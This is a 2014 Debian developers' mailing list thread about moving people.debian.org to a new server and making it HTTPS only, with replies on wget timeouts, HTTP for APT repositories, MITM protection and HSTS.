Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/lq0ddd$fjm$1...@ger.gmane.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Martin Zobel-Helas dixit: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). This means that requests from wget (since it switched from OpenSSL to GnuTLS) and other utilities from slow architectures (such as m68k or avr32) to people.d.o will timeout. Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures). bye, //mirabilos -- “ah that reminds me, thanks for the stellar entertainment that you and certain other people provide on the Debian mailing lists │ sole reason I subscribed to them (I'm not using Debian anywhere) is the entertainment factor │ Debian does not strike me as a place for good humour, much less German admin-style humour” -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/pine.bsm.4.64l.1407132021060.32...@herc.mirbsd.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Martin Zobel-Helas zo...@debian.org, 2014-07-13, 22:13: The plan is to execute a final sync of home directories on 2014-JUL-26 starting at 0800Z. http://xkcd.com/1179/ we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). This is great news. Thanks! :-) -- Jakub Wilk -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140713203139.ga9...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Martin, On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). Could you elaborate on why people.d.o will enforce https? If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive. Is this part of a broader effort by DSA to increase use of https by default as a deterrent to large-scale traffic sniffing? Cheers, -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org signature.asc Description: Digital signature
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 2014-07-13 at 15:19:22 -0700, Steve Langasek wrote: On Sun, Jul 13, 2014 at 10:13:10PM +0200, Martin Zobel-Helas wrote: Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected). […] If http connections are still allowed, this doesn't provide any protection from a MITM attack for most users; and the contents of people.d.o are not generally security sensitive. HSTS protects mostly from MITM (except for first connection), but I'm not sure if DSA is planning to add it. Thanks, Guillem -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20140713230911.ga30...@gaara.hadrons.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 14, 2014 at 7:09 AM, Guillem Jover wrote: HSTS protects mostly from MITM (except for first connection), but I'm not sure if DSA is planning to add it. HSTS is a standard part of HTTPS setup on machines run by DSA, so it is very likely they will. -- bye, pabs https://wiki.debian.org/PaulWise -- To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/caktje6fi2q4x1lmqvdw7nphr0tbuxprswjhfgrqi9tgqzn5...@mail.gmail.com